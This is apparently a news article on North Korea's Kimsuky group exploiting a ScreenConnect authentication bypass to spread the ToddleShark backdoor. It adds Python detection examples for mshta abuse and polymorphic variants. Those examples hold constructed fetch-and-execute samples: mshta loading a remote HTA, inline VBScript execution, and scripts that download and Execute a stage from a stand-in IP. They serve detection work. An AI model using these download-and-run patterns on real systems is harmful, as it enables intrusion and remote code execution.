North Korean hackers are using a critical vulnerability in ConnectWise's ScreenConnect software to spread new, shapeshifting espionage malware.
Two weeks ago, ConnectWise disclosed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug rated "high" at 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, an authentication bypass that earned a rare maximum "critical" score of 10. Attackers pounced almost immediately, most notably initial access brokers (IABs) working with ransomware groups, with thousands of organizations running exposed ScreenConnect servers in the firing line.
Kimsuky (aka APT43), the advanced persistent threat (APT) from the Democratic People's Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, it's exploiting ScreenConnect to deploy a new backdoor called "ToddleShark."
"The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing," according to Kroll. "Patching ScreenConnect applications is therefore imperative."
ToddleShark builds off of previous Kimsuky malware but stands out for its approach to anti-detection.
North Korea Exploits ScreenConnect
In recent espionage campaigns, Kimsuky has deployed various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers encoded as Privacy-Enhanced Mail (PEM) certificates. PEM is a Base64 container wrapped in BEGIN and END header lines, so the encoding does not encrypt the stolen data; it makes the exfiltration traffic look like ordinary certificate material.
"The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," Kroll researchers said in their post, released today.
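The MSHTA execution trait that Kroll mentions is also a detection hook: mshta.exe is a signed Microsoft binary, but it rarely has a legitimate reason to fetch an HTA over HTTP or to run inline script through a protocol handler. The following triage check is an added example, not code from Kroll, ConnectWise or the article, and the Sysmon-style process-creation records it scans are constructed for illustration.

```python
"""
Added example (not Kroll's or ConnectWise's code): flag process-creation
events in which mshta.exe is launched with a remote URL or with an inline
script protocol handler, the two common living-off-the-land uses of the
binary. The event records are constructed, not real telemetry.
"""
import ntpath
import re

# Constructed Sysmon-style process-creation records.
SAMPLE_EVENTS = [
    {"pid": 4012, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\alice\Documents\help.hta"'},
    {"pid": 5120, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta http://198.51.100.7/a8f3c1/index.hta"},
    {"pid": 5133, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "command_line": 'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""calc""")'},
    {"pid": 6001, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs -p"},
]

# A remote HTA pulled over HTTP(S), or an inline script payload handed to
# mshta through the vbscript:/javascript:/about: protocol handlers.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
SCRIPT_PROTOCOL = re.compile(r"\b(?:vbscript|javascript|about):", re.IGNORECASE)


def classify_mshta_event(event):
    """Return a short reason if the event looks like LOLBin abuse of mshta, else None."""
    # Compare on the file name so both System32 and SysWOW64 copies are covered.
    if ntpath.basename(event["image"]).lower() != "mshta.exe":
        return None
    cmd = event["command_line"]
    if REMOTE_URL.search(cmd):
        return "mshta.exe fetching a remote HTA"
    if SCRIPT_PROTOCOL.search(cmd):
        return "mshta.exe running inline script via protocol handler"
    return None


def find_suspicious_mshta(events):
    """Return (pid, reason) pairs for every event the classifier flags."""
    hits = []
    for event in events:
        reason = classify_mshta_event(event)
        if reason:
            hits.append((event["pid"], reason))
    return hits


if __name__ == "__main__":
    for pid, reason in find_suspicious_mshta(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The first record (a local .hta opened from Explorer) is deliberately left alone: some environments still ship HTA-based tooling, so the check keys on where the script comes from rather than on mshta.exe alone. Baseline the parent-process relationships in your own telemetry before turning a hit into an alert.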
How ToddleShark Uses Randomness for Evasion
ToddleShark stands out most, though, for how it uses randomly generated names and layouts to dodge detection. It gives variables and functions random names to defeat static signatures, and it randomizes string constants and the ordering of code blocks to break pattern-based detection.
Large chunks of junk code and hexadecimal-encoded code are interspersed with the real malicious logic, so the finished script looks like a mess.
Hash-based blocklisting doesn't work against ToddleShark, either, because the hash of the initial payload and the URLs used to download additional stages differ from one infection to the next.
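To see why a per-sample hash or URL blocklist fails here, and what still works, the following added example (not ToddleShark's code and not Kroll's tooling) compares two constructed script variants that imitate the traits described above: random identifier names, a different hex-encoded C2 string in each, and junk statements scattered in different places. Their SHA-256 hashes differ, but after collapsing identifiers, strings and numbers to placeholders and comparing token shingles, the two variants still come out closely related while a benign script does not. The "Decode" call in the samples is a hypothetical helper, not a VBScript builtin.

```python
"""
Added example (not from Kroll or the article): exact hashes differ across
polymorphic variants, but a token-normalised shingle comparison still links
them. All three scripts below are constructed and deliberately harmless.
"""
import hashlib
import re

# Constructed variant 1: random identifiers, hex-encoded C2 string, junk arithmetic.
VARIANT_A = r'''
<script language="VBScript">
Dim qzxTmp9 : qzxTmp9 = 41
Dim hQe2Lp
hQe2Lp = "687474703a2f2f3139382e35312e3130302e372f6139322f"
Dim kW0ab : kW0ab = qzxTmp9 * 2
Set o8Zz = CreateObject("MSXML2.XMLHTTP")
o8Zz.Open "GET", Decode(hQe2Lp) & "stage2", False
o8Zz.Send
Execute o8Zz.responseText
</script>
'''

# Constructed variant 2: same logic, new names, different C2 path, junk moved around.
VARIANT_B = r'''
<script language="VBScript">
Dim pLm3
' kX7 initialise
Dim zR77q : zR77q = "hello"
pLm3 = "687474703a2f2f3139382e35312e3130302e372f6435312f"
Set vB1 = CreateObject("MSXML2.XMLHTTP")
Dim ww4 : ww4 = Len(zR77q)
vB1.Open "GET", Decode(pLm3) & "stage2", False
vB1.Send
Execute vB1.responseText
</script>
'''

# Constructed benign HTA for contrast.
BENIGN = r'''
<script language="VBScript">
Sub Window_OnLoad
  MsgBox "Welcome to the help center"
End Sub
</script>
'''

# String literal, VBScript comment, integer, identifier, or any other single symbol.
TOKEN = re.compile(r'"[^"]*"|\'[^\n]*|\b\d+\b|[A-Za-z_]\w*|\S')

# Keywords and API names kept verbatim; every other identifier is treated as
# an attacker-chosen random name and collapsed to ID. "decode" is the
# hypothetical helper used by the samples.
KEEP = {"dim", "set", "createobject", "open", "send", "execute", "responsetext",
        "false", "true", "len", "decode", "script", "language"}


def raw_hash(src):
    """What a hash blocklist sees: changes with every renamed variable or new URL."""
    return hashlib.sha256(src.encode()).hexdigest()


def normalize(src):
    """Token stream with names, strings and numbers replaced by placeholders."""
    out = []
    for tok in TOKEN.findall(src):
        if tok.startswith("'"):
            continue                      # drop comments (junk text, no behaviour)
        if tok.startswith('"'):
            out.append("STR")             # C2 URLs, hex blobs, identity strings
        elif tok.isdigit():
            out.append("NUM")
        elif re.match(r"[A-Za-z_]", tok):
            low = tok.lower()
            out.append(low if low in KEEP else "ID")
        else:
            out.append(tok)               # operators and punctuation as-is
    return out


def shingles(tokens, n=3):
    """Set of n-token windows; junk insertions only add shingles, they do not erase shared ones."""
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}


def similarity(src_a, src_b):
    """Jaccard similarity of normalised shingle sets, in [0, 1]."""
    a, b = shingles(normalize(src_a)), shingles(normalize(src_b))
    return len(a & b) / len(a | b)


if __name__ == "__main__":
    print("hashes equal:", raw_hash(VARIANT_A) == raw_hash(VARIANT_B))
    print("A vs B:", round(similarity(VARIANT_A, VARIANT_B), 2))
    print("A vs benign:", round(similarity(VARIANT_A, BENIGN), 2))
```

The shingle similarity is a triage aid, not a verdict: it tells an analyst that a newly seen script shares most of its normalised structure with a known sample despite a fresh hash and a fresh download URL. Pair it with behavioural detections (such as the MSHTA launch pattern) rather than relying on any single indicator.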
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they haven't already. A patch and other resources for ConnectWise customers are available on the vendor's website.